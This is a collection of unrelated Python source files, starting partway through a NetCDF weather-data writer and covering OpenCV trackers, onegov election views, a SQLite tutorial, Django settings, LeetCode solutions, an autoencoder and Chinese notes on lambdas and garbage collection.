pressure_variable.g_format_type = 'FLT'
pressure_variable.coordinates = "lon lat alt"
pressure_variable[:] = pressure
# dew_point
dew_point_variable = dataset.createVariable('FP', 'f4', ("time", ), zlib=True, fill_value=-32768)
dew_point_variable.units = 'C'
dew_point_variable.long_name = 'Frostpoint'
dew_point_variable.g_format_type = 'FLT'
dew_point_variable.coordinates = "lon lat alt"
dew_point_variable[:] = dew_point
# wind_direction
wind_direction_variable = dataset.createVariable('wdir', 'f4', ("time", ), zlib=True, fill_value=-32768)
wind_direction_variable.standard_name = 'wind_from_direction'
wind_direction_variable.units = 'degree'
wind_direction_variable.long_name = 'Wind Direction'
wind_direction_variable.g_format_type = 'FLT'
wind_direction_variable.coordinates = "lon lat alt"
wind_direction_variable.comment = "Wind direction"
wind_direction_variable[:] = wind_direction
# wind_speed
wind_speed_variable = dataset.createVariable('wspeed', 'f4', ("time", ), zlib=True, fill_value=-32768)
wind_speed_variable.standard_name = 'wind_speed'
wind_speed_variable.units = 'm s-1'
wind_speed_variable.long_name = 'Wind Speed'
wind_speed_variable.g_format_type = 'FLT'
wind_speed_variable.coordinates = "lon lat alt"
wind_speed_variable.comment = "Wind speed"
wind_speed_variable[:] = wind_speed
# ascrate
ascrate_variable = dataset.createVariable('ascrate', 'f4', ("time", ), zlib=True, fill_value=-32768)
ascrate_variable.standard_name = 'ascrate'
ascrate_variable.units = 'm/s'
ascrate_variable.long_name = 'Ascension rate'
ascrate_variable.g_format_type = 'FLT'
ascrate_variable[:] = ascrate
dataset.close()
def main():
wind_file = '/home/kinow/Downloads/Inv_upper_air_wind_MetService_simple2.txt'
txt_file = '/home/kinow/Downloads/99100110.TXT'
output_file = '/home/kinow/Downloads/99100110-with-wind-data.nc'
logger.info('Parsing WIND file')
dates = parse_wind_file(wind_file)
logger.info('Done')
logger.info('Parsing TXT file')
data = parse_txt_file(txt_file, dates)
logger.info('Done')
logger.info('Writing NetCDF file')
write_netcdf_file(data, output_file)
if __name__ == '__main__':
main()
|
from datetime import datetime
from behave import given, then
from behave.runner import Context
from freezegun import freeze_time
from pepy.domain.model import ProjectName, ProjectDownloads, Downloads
from tests.tools.stub import ProjectStub
@given("today is {date}")
def step_impl(context: Context, date: str):
freezer = freeze_time(date)
freezer.start()
|
from onegov.ballot import Election
from onegov.ballot import List
from onegov.core.security import Public
from onegov.election_day import ElectionDayApp
from onegov.election_day.layouts import ElectionLayout
from onegov.election_day.utils import add_last_modified_header
from sqlalchemy import func
def list_options(request, election):
if election.type == 'majorz':
return []
mandates = request.translate(request.app.principal.label('mandates'))
return [
(
request.link(list_, name='by-district'),
'{} {}'.format(
list_.name,
(
f'({list_.number_of_mandates} {mandates})'
if list_.number_of_mandates and election.completed else ''
)
).strip()
)
for list_ in election.lists.order_by(None).order_by(
List.number_of_mandates.desc(),
func.lower(List.name)
)
]
@ElectionDayApp.json(
model=List,
name='by-district',
permission=Public
)
def view_list_by_district(self, request):
"""" View the list by district as JSON. """
return self.percentage_by_district
@ElectionDayApp.html(
model=Election,
name='list-by-district',
template='election/heatmap.pt',
permission=Public
)
def view_election_list_by_district(self, request):
"""" View the list as heatmap by district. """
layout = ElectionLayout(self, request, 'list-by-district')
options = list_options(request, self)
data_url = options[0][0] if options else None
return {
'election': self,
'layout': layout,
'options': options,
'map_type': 'districts',
'data_url': data_url,
'embed_source': request.link(
self,
name='list-by-district-chart',
query_params={'locale': request.locale}
)
}
@ElectionDayApp.html(
model=Election,
name='list-by-district-chart',
template='embed.pt',
permission=Public
)
def view_election_list_by_district_chart(self, request):
"""" Embed the heatmap. """
@request.after
def add_last_modified(response):
add_last_modified_header(response, self.last_modified)
options = list_options(request, self)
data_url = options[0][0] if options else None
return {
'model': self,
'layout': ElectionLayout(self, request),
'type': 'map',
'scope': 'districts',
'year': self.date.year,
'thumbs': 'false',
'color_scale': 'r',
'label_left_hand': '0%',
'label_right_hand': '100%',
'data_url': data_url,
'options': options
}
|
# -*- coding: utf-8 -*-
"""
Name: SQLite example of creating tables and inserting rows.
Author: Martin Bo Kristensen Grønholdt.
Version: 1.0 (2017-04-22)
"""
# Import the SQLite module
import sqlite3
# Start an exception block to catch errors.
try:
# Create a connection to a database with the file name 'example.db'. The file
# is created if missing.
conn = sqlite3.connect('example.db')
# Get a Cursor object to used to perfom SQL commands on the database.
cursor = conn.cursor()
# Create the customerTable table.
print('Creating customerTable...', end='')
cursor.execute(
"""
CREATE TABLE customerTable(
idCust INT NOT NULL UNIQUE,
name VARCHAR(100),
email VARCHAR(50),
address VARCHAR(50),
city VARCHAR(30),
PRIMARY KEY (idCust)
)
"""
)
# Insert the data in to the table.
cursor.execute(
"""
INSERT INTO customerTable VALUES(
1,
'Per',
'pda@eal.dk',
'Mystreet1',
'Odense'
)
"""
)
# Can we make the street name Opampstreet to fit the number? ;-)
cursor.execute(
"""
INSERT INTO customerTable VALUES(
2,
'Artur',
'at@hotmail.com',
'Allstreet 741',
'Vilnius'
)
"""
)
cursor.execute(
"""
INSERT INTO customerTable VALUES(
3,
'Alice',
'ab@gmail.com',
'Topstreet 56',
'London'
)
"""
)
# Commit the data to the database.
conn.commit()
print('done')
print('\nCurrent entries in the database:')
# Select all rows in the customerTable table.
cursor.execute('SELECT * FROM customerTable')
# A counter to make things look nice in the output.
row_nr = 0
# Run trhough all rows.
for row in cursor.fetchall():
# Next row number.
row_nr += 1
# Print row number.
print('Row {}: '.format(row_nr), end='')
# Run through all fields in the row.
for field in row:
# Print the fields.
print('{}, '.format(field), end='')
# Next line.
print()
except sqlite3.Error as sql_error:
print('\n\nAn database error occurred!')
print('Error is: ' + str(sql_error))
|
# -*- coding: utf-8 -*-
# jieba_wikiData.py将wiki数据用jieba进行分词,生成wiki.zh.text.seg文件
import jieba
# jieba.load_userdict('userdict.txt')
# 创建停用词list
def stop_words_list(filepath):
stopwords = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return stopwords
# 对句子进行分词
def seg_sentence(sentence):
sentence_seged = jieba.cut(sentence.strip())
stopwords = stop_words_list('stopwords.txt') # 这里加载停用词的路径
outstr = ''
for word in sentence_seged:
if word not in stopwords and word != '\t':
outstr += word
outstr += " "
return outstr
inputs = open('wiki.zh.text', 'r', encoding='utf-8')
outputs = open('wiki.zh.text.seg', 'w', encoding='utf-8')
for line in inputs:
line_seg = seg_sentence(line) # 这里的返回值是字符串
outputs.write(line_seg + '\n')
outputs.close()
inputs.close()
|
#!/bin/python3
def mini_max_sum(arr):
current_min = min(arr[:2])
current_max = max(arr[:2])
running_sum = 0
for value in arr[2:]:
if value < current_min:
running_sum += current_min
current_min = value
elif value > current_max:
running_sum += current_max
current_max = value
else:
running_sum += value
return str(running_sum + current_min) + ' ' + str(running_sum + current_max)
print(mini_max_sum([int(x) for x in input().strip().split(' ')])) |
###############################################################################
#
# trackers.py
#
# Python OpenCV program for testing different trackers.
# It is based on code from [https://www.learnopencv.com/object-tracking-using-opencv-cpp-python/]
#
# The program has three operating modes:
# 'm' key Mark: enter this mode while holding an object in front of the webcam,
# and use the mouse to select it with a rectangle.
# 's' key Show: this is a test mode that shows the tracked object. Use this mode
# to test tracking on the display.
#
# TODO
# 't' key Track: this mode activates the motors and sends power controls to them.
# The Track mode will be halted (red 'Track' symbol) if the blob is lost, or
# more than one blob is detected. Tracking will resume automatically when
# a single blob is re-detected.
#
# January 28, 2018
#
###############################################################################
import sys
import numpy as np
import cv2
import opencvconst as cv
import time
###############################################################################
#
# main()
#
def main():
"""Control function that reads webcam, and tracks a marked object."""
global x0, y0, x1, y1, drawing, mode, frame, bbox, tracker, tracker_initialized
global MODE_MARK
#
# initialization
#
(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
MODE_TRACK = 0 # track an object
MODE_SHOW = 1 # only show tracking markers on video
MODE_MARK = 2 # mark region color to track
MODE_TRACK_HOLD = 3 # temporarily suspend tracking until object is recaptured
tracker_initialized = False
bbox = (0, 0, 0, 0)
last_good_bbox = bbox
mode = MODE_SHOW
mode_text = 'Show'
fps_text = '?? Fps'
drawing = False # true if mouse is pressed
x0, y0 = -1, -1
x1, y1 = -1, -1
print ' m - mark color region to track\n s - display tracking marker only\n ESC - quit'
#
# Initialize tart time and frame count
#
frame_count = 0
start = time.time()
#
# link event callback function
#
cv2.namedWindow('image', cv2.WINDOW_GUI_NORMAL+cv2.WINDOW_AUTOSIZE)
cv2.setMouseCallback('image', mark_rect)
#
# setup font for overlay text
#
font = cv2.FONT_HERSHEY_SIMPLEX
#
# Set up tracker.
#
tracker_types = ['BOOSTING', 'MIL','KCF', 'TLD', 'MEDIANFLOW', 'GOTURN']
tracker_type = tracker_types[2]
if int(minor_ver) < 3:
tracker = cv2.Tracker_create(tracker_type)
else:
if tracker_type == 'BOOSTING':
tracker = cv2.TrackerBoosting_create()
if tracker_type == 'MIL':
tracker = cv2.TrackerMIL_create()
if tracker_type == 'KCF':
tracker = cv2.TrackerKCF_create()
if tracker_type == 'TLD':
tracker = cv2.TrackerTLD_create()
if tracker_type == 'MEDIANFLOW':
tracker = cv2.TrackerMedianFlow_create()
if tracker_type == 'GOTURN':
tracker = cv2.TrackerGOTURN_create()
#
# open the capture device and print some
# useful properties
#
cap = cv2.VideoCapture(0)
if cap.isOpened():
#cap.set(cv.CV_CAP_PROP_FRAME_WIDTH, 320)
#cap.set(cv.CV_CAP_PROP_FRAME_HEIGHT, 240)
frameWidth = cap.get(cv.CV_CAP_PROP_FRAME_WIDTH)
frameHeight = cap.get(cv.CV_CAP_PROP_FRAME_HEIGHT)
print 'frame: width {}, height {}'.format(frameWidth, frameHeight)
frameCenterX = int(frameWidth/2)
frameCenterY = int(frameHeight/2)
else:
sys.exit()
#
# frame capture and processing loop
#
while(True):
#
# capture a frame
# cover to appropriate color space to improve detection
# in different lighting conditions
#
cap_ok, frame = cap.read()
if not cap_ok:
break
#
# Operations on the captured image done here.
# If marking a section on the object color for tracking
# then only display the selection
#
if mode == MODE_MARK:
cv2.rectangle(frame, (x0, y0), (x1, y1), (0, 255, 0), 1)
#
# If tracking or only displaying object tracking information
# then draw the tracking markers on the frame before it is displayed.
# Only do this if the tracker was initialized
#
elif tracker_initialized:
#
# Update the tracker with the newly acquired frame.
#
track_ok, bbox = tracker.update(frame)
if track_ok:
last_good_bbox = bbox
p1 = (int(bbox[0]), int(bbox[1]))
p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))
cv2.rectangle(frame, p1, p2, (255, 0, 0), 2)
object_x = int(bbox[0] + bbox[2]/2)
object_y = int(bbox[1] + bbox[3]/2)
err_pan_i = frameCenterX - object_x
err_tilt_i = frameCenterY - object_y
cv2.arrowedLine(frame, (frameCenterX, frameCenterY), (object_x, object_y), (255, 0, 0), 2)
if mode == MODE_TRACK_HOLD:
mode = MODE_TRACK
else:
p1 = (int(last_good_bbox[0]), int(last_good_bbox[1]))
p2 = (int(last_good_bbox[0] + last_good_bbox[2]), int(last_good_bbox[1] + last_good_bbox[3]))
cv2.rectangle(frame, p1, p2, (0, 0, 255), 1)
if mode == MODE_TRACK:
mode = MODE_TRACK_HOLD
#
# Calculate and display FPS.
# Use the 10sec interval to also poll the NXT for battery level.
#
frame_count = frame_count + 1
end = time.time()
measure_interval = end - start
if measure_interval > 10:
fps = frame_count / measure_interval
fps_text = '{:.2f} Fps'.format(fps)
frame_count = 0
start = time.time()
#
# Add text and other markers to the image
#
if mode == MODE_TRACK_HOLD:
cv2.putText(frame, mode_text, (1, 20), font, 0.4, (0, 0, 255), 1, cv2.LINE_AA)
else:
cv2.putText(frame, mode_text, (1, 20), font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
cv2.putText(frame, tracker_type, (1, 40), font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
cv2.putText(frame, fps_text, (1, 60), font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
#
# Display the resulting frame
#
cv2.imshow('image', frame)
#
# key input mode/command
#
key = cv2.waitKey(1) & 0xFF
if key == 27:
break
elif key == ord('m'):
x0,y0 = -1,-1
x1,y1 = -1,-1
mode_text = 'Mark'
mode = MODE_MARK
elif key == ord('s'):
mode_text = 'Show'
mode = MODE_SHOW
else:
pass
#
# When done, release the capture.
#
cap.release()
cv2.destroyAllWindows()
###########################################################
#
# mark_rect()
#
# Mouse event callback function.
# Used to capture mouse event and mark object for tracking.
#
# param: event type, mouse coordinates and event parameters
# return: nothing, marks a frame region for tracker initialization
#
def mark_rect(event, x, y, flags, param):
"""Mouse callback that marks a frame region for tracker initialization."""
global x0, y0, x1, y1, drawing, mode, frame, bbox, tracker, tracker_initialized
global MODE_MARK
if mode != MODE_MARK:
return
if event == cv2.EVENT_LBUTTONDOWN:
drawing = True
x0, y0 = x, y
x1, y1 = x, y
elif event == cv2.EVENT_MOUSEMOVE:
if drawing == True:
x1, y1 = x, y
elif event == cv2.EVENT_LBUTTONUP:
drawing = False
#
# Convert any start (x0,y0) and end (x1,y1) points to be
# a top-left to bottom right pair.
# Extract ROI and initialize the tracker
#
if x0 == x1 or y0 == y1 or x0 < 0 or x1 < 0 or y0 < 0 or y1 < 0:
return
if x0 > x1:
x0, x1 = x1, x0
if y0 > y1:
y0, y1 = y1, y0
bbox = (x0, y0, x1-x0, y1-y0)
tracker_initialized = tracker.init(frame, bbox)
print 'tracker.init()', tracker_initialized
#
# Startup
#
if __name__ == '__main__':
main()
|
# Jaemin Lee (aka, J911)
# 2019
import cv2
import numpy as np
class CustomCapture:
def _cam_initialize(self):
self.cam = cv2.VideoCapture(0)
self.cam.set(3, 1280)
self.cam.set(4, 720)
def _cam_release(self):
self.cam.release()
def capture(self, label=''):
capture_data = []
capture_labels = []
self._cam_initialize()
while True:
f, img = self.cam.read()
img = cv2.cvtColor(img, f)
display_img = cv2.putText(cv2.flip(img, 1), label, (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0))
cv2.imshow("Custom Capture", display_img)
img = np.moveaxis(img, -1, 0)
key = cv2.waitKey(1)
if key == 97: # left
capture_data.append(img)
capture_labels.append(0)
print("save left photos!")
if key == 100: #right
capture_data.append(img)
capture_labels.append(1)
print("save right photos!")
if key == 27: # esc
break
self._cam_release()
return (capture_data, capture_labels)
if __name__ == '__main__':
cap = CustomCapture()
x, y = cap.capture()
print(x, y) |
import os
import shutil
import sys
from pathlib import Path
import click
from subprocess import check_output
from onegov.core.cli import command_group
from onegov.core.utils import module_path
cli = command_group()
def pre_checks():
node_version = check_output('node --version', shell=True)
if 'v10' not in node_version.decode('utf-8'):
click.secho('Foundation CLI currently works with node version 10')
sys.exit()
if not shutil.which('npm'):
click.secho('Install npm package manager')
sys.exit()
if not shutil.which('foundation'):
click.secho('Install foundation cli first: '
'npm install -g foundation-cli')
sys.exit()
@cli.command(context_settings={
'matches_required': False,
'default_selector': '*'
})
def update():
""" Update helper for foundation6 using node and webpack.
By the time this cli is used, probabely things already changed and
it needs to be adapted.
Also some import might not work and have to be adapted manually.
The Backup files can always be consulted.
"""
pre_checks()
module = Path(module_path('onegov.foundation6', 'foundation')).parent
assets = module / 'assets'
src = module / 'foundation'
vendor_src = module / 'foundation' / 'vendor'
# src_bckp = module / 'foundation.bak'
for p in (src, vendor_src, assets):
assert p.is_dir(), str(p)
foundation_js_files = ('foundation.min.js', 'foundation.js')
os.chdir('/tmp')
if not os.path.exists('/tmp/foundation-update'):
os.system(
'echo foundation-update | '
'foundation new --framework sites --template zurb'
)
os.chdir('foundation-update')
node_root = Path('/tmp/foundation-update/node_modules/foundation-sites')
# click.secho('Create a backup', fg='green')
# shutil.copytree(src, src_bckp)
for name in ('scss', '_vendor'):
click.secho(f'Copy {name} files')
dest_ = src / 'foundation' / name
src_ = node_root / name
assert src_.is_dir(), str(src_)
assert dest_.is_dir(), str(dest_)
shutil.copytree(src_, dest_, dirs_exist_ok=True)
click.secho('Copy foundation js files')
for name in foundation_js_files:
shutil.copyfile(
node_root / 'dist' / 'js' / name,
assets / name
)
click.secho('Copy motion-ui files')
mui_src = node_root.parent / 'motion-ui' / 'src'
assert mui_src.is_dir()
mui_dest = vendor_src / 'motion-ui'
assert mui_dest.is_dir()
shutil.copytree(mui_src, mui_dest, dirs_exist_ok=True)
click.secho('Run git add . to be sure everything is checked in.')
click.secho('To roll back the changes, just use the power of git!')
click.secho('Finished.', fg='green')
|
from rv.modules import Behavior as B
from rv.modules import Module
from rv.modules.base.kicker import BaseKicker
class Kicker(BaseKicker, Module):
behaviors = {B.receives_notes, B.sends_audio}
|
import torch
num = 32
num_priors = 8732
print(num, num_priors)
loc_t = torch.Tensor(num, num_priors, 4)
print(loc_t)
t = torch.cat(1,1)
print(t) |
"""
"""
from leetCodeUtil import TreeNode
class Solution(object):
def sortedArrayToBST(self, nums):
"""
:type nums: List[int]
:rtype: TreeNode
"""
root = self.constructTree(nums, 0, len(nums))
return root
def constructTree(self, nums, start, end):
if start >= end:
return
mid = start + int((end-start)/2)
node = TreeNode(nums[mid])
node.left = self.constructTree(nums, start, mid)
node.right = self.constructTree(nums, mid+1, end)
return node
|
import cv2
import numpy as np
pic=cv2.imread('image.jpg')
threshold_value=100
(T_value, binary_threshold)=cv2.threshold(pic, threshold_value, 255, cv2.THRESH_BINARY)
cv2.imshow('binary', binary_threshold)
cv2.waitKey()
cv2.destroyAllWindows()
|
# [실습]
# keras67_1 남자 여자에 noise를 넣어서 제거하시오.
# 실습
# 남자 여자 구별
# ImageDataGenerator / fit_generator 사용해서 완성
import numpy as np
from matplotlib import pyplot as plt
import random
from sklearn.model_selection import train_test_split
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.models import Sequential, Model, load_model
from tensorflow.keras.layers import Dense, Conv2D, Conv2DTranspose, MaxPooling2D, Flatten, Dropout, BatchNormalization, Input
from tensorflow.keras.layers import LeakyReLU, ReLU
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
x_train = np.load('../data/image/brain/npy/k67_train_x.npy')
x_test = np.load('../data/image/brain/npy/k67_val_x.npy')
print(x_train.shape) # (1389, 150, 150, 3)
print(x_test.shape) # (347, 150, 150, 3)
# plt.imshow(x_test[0])
# plt.show()
x_train_noised = x_train + np.random.normal(0, 0.1, size=x_train.shape)
x_test_noised = x_test + np.random.normal(0, 0.1, size=x_test.shape)
x_train_noised = np.clip(x_train_noised, a_min = 0, a_max = 1)
x_test_noised = np.clip(x_test_noised, a_min = 0, a_max = 1)
def autoencoder():
inputs = Input(shape=(150,150,3))
layer1 = Conv2D(64, (3,3), strides=2, padding='same')(inputs)
layer1_ = BatchNormalization()(layer1)
layer1 = LeakyReLU()(layer1_)
layer2 = Conv2D(128, (3,3), strides=2, padding='valid')(layer1)
layer2_ = BatchNormalization()(layer2)
layer2 = LeakyReLU()(layer2_)
layer3 = Conv2D(256, (3,3), strides=2, padding='valid')(layer2)
layer3_ = BatchNormalization()(layer3)
layer3 = LeakyReLU()(layer3_)
layer4 = Conv2D(512, (3,3), strides=2, padding='same')(layer3)
layer4_ = BatchNormalization()(layer4)
layer4 = LeakyReLU()(layer4_)
layer5 = Conv2DTranspose(256, (3,3), strides=2, padding='same')(layer4)
layer5 = BatchNormalization()(layer5)
layer5 = layer5 + layer3_
layer5 = Dropout(0.5)(layer5)
layer5 = ReLU()(layer5)
layer6 = Conv2DTranspose(128, (3,3), strides=2, padding='valid')(layer5)
layer6 = BatchNormalization()(layer6)
layer6 = layer6+layer2_
layer6 = Dropout(0.5)(layer6)
layer6 = ReLU()(layer6)
layer7 = Conv2DTranspose(64, (3,3), strides=2, padding='valid')(layer6)
layer7 = BatchNormalization()(layer7)
layer7 = layer7+layer1_
layer7 = Dropout(0.5)(layer7)
layer7 = ReLU()(layer7)
layer8 = Conv2DTranspose(3, (3,3), strides=2, padding='same')(layer7)
outputs = layer8
model = Model(inputs=inputs, outputs=outputs)
return model
model = autoencoder()
model.summary()
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
modelpath = '../data/modelcheckpoint/noise_model.hdf5'
es = EarlyStopping(monitor='accuracy', patience=30)
cp = ModelCheckpoint(filepath=modelpath, monitor='accuracy', save_best_only=True)
lr = ReduceLROnPlateau(monitor='accuracy', patience=8, factor=0.8)
model.fit(x_train_noised, x_train, epochs=1000, callbacks=[es,cp,lr])
model = load_model('../data/modelcheckpoint/noise_model.hdf5')
output = model.predict(x_test_noised)
fig, ((ax1, ax2, ax3, ax4, ax5), (ax6, ax7, ax8, ax9, ax10), (ax11, ax12, ax13, ax14, ax15)) = plt.subplots(3, 5, figsize=(20,7))
# 이미지 5개를 무작위로 고른다.
random_imgs = random.sample(range(output.shape[0]), 5)
# 원본(입력) 이미지를 맨 위에 그린다!!
for i, ax in enumerate([ax1, ax2, ax3, ax4, ax5]):
ax.imshow(x_test[random_imgs[i]].reshape(150,150,3))
if i == 0:
ax.set_ylabel('INPUT', size=20)
ax.grid(False)
ax.set_xticks([])
ax.set_yticks([])
# 잡음을 넣은 이미지
for i, ax in enumerate([ax6, ax7, ax8, ax9, ax10]):
ax.imshow(x_test_noised[random_imgs[i]].reshape(150,150,3))
if i == 0:
ax.set_ylabel('Noise', size=20)
ax.grid(False)
ax.set_xticks([])
ax.set_yticks([])
# 오토인코더가 출력한 이미지
for i, ax in enumerate([ax11, ax12, ax13, ax14, ax15]):
ax.imshow(output[random_imgs[i]].reshape(150,150,3))
if i == 0:
ax.set_ylabel('OUTPUT', size=20)
ax.grid(False)
ax.set_xticks([])
ax.set_yticks([])
plt.show()
|
from .common import * # import the common settings, across all deployments
DEBUG = True
TEMPLATE_DEBUG = DEBUG
def has_debug_toolbar():
try:
import debug_toolbar
dir(debug_toolbar)
return True
except ImportError:
return False
if has_debug_toolbar():
INSTALLED_APPS += (
'debug_toolbar',
)
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False
}
DEBUG_TOOLBAR_PANELS = (
'debug_toolbar.panels.version.VersionDebugPanel',
'debug_toolbar.panels.timer.TimerDebugPanel',
'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',
'debug_toolbar.panels.headers.HeaderDebugPanel',
'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',
'debug_toolbar.panels.template.TemplateDebugPanel',
'debug_toolbar.panels.sql.SQLDebugPanel',
'debug_toolbar.panels.signals.SignalDebugPanel',
'debug_toolbar.panels.logger.LoggingPanel',
)
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
MOCK_CREDIT = True
|
"""
匿名函数与lambda
lambda表达式,通常是在需要一个函数,但是又不想费神去命名一个函数的场合下使用,也就是指匿名函数。
lambda所表示的匿名函数的内容应该是很简单的,如果复杂的话,干脆就重新定义一个函数了,使用lambda就有点过于执拗了。
lambda就是用来定义一个匿名函数的,如果还要给他绑定一个名字的话,就会显得有点画蛇添足,通常是直接使用lambda函数。如下所示:
add = lambda x, y : x+y
add(1,2) # 结果为3
那么到底要如何使用lambda表达式呢?
1、应用在函数式编程中
Python提供了很多函数式编程的特性,如:map、reduce、filter、sorted等这些函数都支持函数作为参数,lambda函数就可以应用在函数式编程中。如下:
# 需求:将列表中的元素按照绝对值大小进行升序排列
list = [3,5,-4,-1,0,-2,-6]
sorted(list1, key=lambda x: abs(x))
当然,也可以如下:
list1 = [3,5,-4,-1,0,-2,-6]
def get_abs(x):
return abs(x)
sorted(list1,key=get_abs)
只不过这种方式的代码看起来不够Pythonic
2、应用在闭包中
def get_y(a,b):
return lambda x:ax+b
y1 = get_y(1,1)
y1(1) # 结果为2
当然,也可以用常规函数实现闭包,如下:
def get_y(a,b):
def func(x):
return ax+b
return func
y1 = get_y(1,1)
y1(1) # 结果为2
只不过这种方式显得有点啰嗦。
"""
"""
Python引入了一个机制:引用计数。
python内部使用引用计数,来保持追踪内存中的对象,Python内部记录了对象有多少个引用,即引用计数,
当对象被创建时就创建了一个引用计数,当对象不再需要时,这个对象的引用计数为0时,它被垃圾回收。
总结一下对象会在一下情况下引用计数加1:
1.对象被创建:x=4
2.另外的别人被创建:y=x
3.被作为参数传递给函数:foo(x)
4.作为容器对象的一个元素:a=[1,x,'33']
引用计数减少情况
1.一个本地引用离开了它的作用域。比如上面的foo(x)函数结束时,x指向的对象引用减1。
2.对象的别名被显式的销毁:del x ;或者del y
3.对象的一个别名被赋值给其他对象:x=789
4.对象从一个窗口对象中移除:myList.remove(x)
5.窗口对象本身被销毁:del myList,或者窗口对象本身离开了作用域。
垃圾回收
1、当内存中有不再使用的部分时,垃圾收集器就会把他们清理掉。它会去检查那些引用计数为0的对象,
然后清除其在内存的空间。当然除了引用计数为0的会被清除,还有一种情况也会被垃圾收集器清掉:当两个对象相互引用时,
他们本身其他的引用已经为0了。
2、垃圾回收机制还有一个循环垃圾回收器, 确保释放循环引用对象(a引用b, b引用a, 导致其引用计数永远不为0)。
在Python中,许多时候申请的内存都是小块的内存,这些小块内存在申请后,很快又会被释放,由于这些内存的申请并不是为
了创建对象,所以并没有对象一级的内存池机制。这就意味着Python在运行期间会大量地执行malloc和free的操作,频繁地
在用户态和核心态之间进行切换,这将严重影响Python的执行效率。为了加速Python的执行效率,Python引入了一个内存池机制,
用于管理对小块内存的申请和释放。
内存池机制
Python提供了对内存的垃圾收集机制,但是它将不用的内存放到内存池而不是返回给操作系统。
Python中所有小于256个字节的对象都使用pymalloc实现的分配器,而大的对象则使用系统的 malloc。另外Python对象,如整数,浮点数和List
,都有其独立的私有内存池,对象间不共享他们的内存池。也就是说如果你分配又释放了大量的整数,用于缓存这些整数的内存就不能再分配给浮点数。""" |
/home/ajitkumar/anaconda3/lib/python3.7/fnmatch.py |
#!/usr/bin/python2
__module_name__ = "invite.py"
__module_version__ = "1.0"
__module_description__ = "Invite Plugin"
__module_author__ = "Ferus"
import xchat
def invited(word, word_eol, userdata):
'''Looks like we've been invited to a channel, lets join it!'''
print("* \x02[Invite]\x02 Invited to {0}, Now joining.".format(word[0]))
xchat.command("JOIN {0}".format(word[0]))
xchat.hook_print('Invited', invited)
print ("Loaded "+ __module_author__ +"'s "+ __module_description__)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-11-09 15:49
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('carto', '0041_auto_20171109_1634'),
]
operations = [
migrations.CreateModel(
name='Marche',
fields=[
('id_marche', models.AutoField(primary_key=True, serialize=False)),
('datecreation', models.DateField()),
('datedestruction', models.DateField(blank=True)),
('commentaire', models.CharField(blank=True, max_length=255)),
('libelle', models.CharField(max_length=255)),
('id_objet', models.ForeignKey(db_column='id_objet', on_delete=django.db.models.deletion.CASCADE, to='carto.Objet')),
],
options={
'db_table': 'marche',
},
),
migrations.AddField(
model_name='pointtopo',
name='id_objet',
field=models.ForeignKey(db_column='id_objet', default=-1, on_delete=django.db.models.deletion.CASCADE, to='carto.Objet'),
preserve_default=False,
),
migrations.AddField(
model_name='topographie',
name='id_objet',
field=models.ForeignKey(db_column='id_objet', default=-1, on_delete=django.db.models.deletion.CASCADE, to='carto.Objet'),
preserve_default=False,
),
]
|
#Missing numbers
def findMissingNums(arr):
minNum = arr[0]
maxNum = arr[len(arr) - 1]
limit = 10
i = 0
res = ''
while i < len(arr):
if i < minNum:
res += str(i) + ' - ' + str(minNum - 1) + ' , '
print(res)
minNum = i
if (i + 1) < len(arr):
diff = arr[i + 1] - arr[i]
print(diff)
if diff > 2:
res += str(arr[i] + 1) + ' - ' + str(arr[i + 1] - 1) + ' , '
#i = i + 1
else:
res += str(arr[i] + 1) + ' , '
if (i + 1) == len(arr):
if arr[i] < limit:
res += str(arr[i] + 1) + ' - ' + str(limit)
#else:
i += 1
return res
arr = [3 , 10]
n = 5
print(findMissingNums(arr))
|
# @Title: 汉明距离 (Hamming Distance)
# @Author: 2464512446@qq.com
# @Date: 2019-09-06 16:58:22
# @Runtime: 20 ms
# @Memory: 11.4 MB
class Solution(object):
def hammingDistance(self, x, y):
"""
:type x: int
:type y: int
:rtype: int
"""
return bin(x ^ y).count('1')
|
from .zhihu import ZhihuSpider
from .hupu import HupuSpider
from .v2ex import V2exSpider
from .weibo import WeiBoSpider
from .github import GithubSpider
from .tieba import TiebaSpider
from .douban import DoubanSpider
from .tianya import TianyaSpider
from .baidu import BaiduSpider
from .spider_36kr import Spider36kr
from .qdaily import QdailySpider
from .guokr import GuokrSpider
from .huxiu import HuxiuSpider |
import cv2
import logging
import numpy as np
from .tracklet import Tracklet
class Tracker:
def __init__(self, detector, encoders, matcher, predictor=None, last_frame=None, max_ttl=30, max_feature_history=30,
max_detection_history=3000, min_time_lived=5):
self.detector = detector
self.encoders = encoders
self.matcher = matcher
self.last_frame = last_frame
self.predictor = predictor
self.max_ttl = max_ttl
self.max_feature_history = max_feature_history
self.max_detection_history = max_detection_history
self.min_time_lived = min_time_lived
self.max_id = 0
self.tracklets_active = []
self.tracklets_finished = []
self.frame_num = 0
self.logger = logging.getLogger('MOT')
def clear(self):
self.max_id = 0
self.tracklets_active = []
self.tracklets_finished = []
self.frame_num = 0
def tick(self, img):
"""
Detect, encode and match, following the tracking-by-detection paradigm.
The tracker works online. For each new frame, the tracker ticks once.
:param img: A 3D numpy array with shape (H, W, 3). The new frame in the sequence.
"""
self.frame_num += 1
# Prediction
self.predict(img)
# Detection
detections = self.detector(img)
# Encoding
features = self.encode(detections, img)
# Data Association
row_ind, col_ind = self.matcher(self.tracklets_active, features)
# Tracklet Update
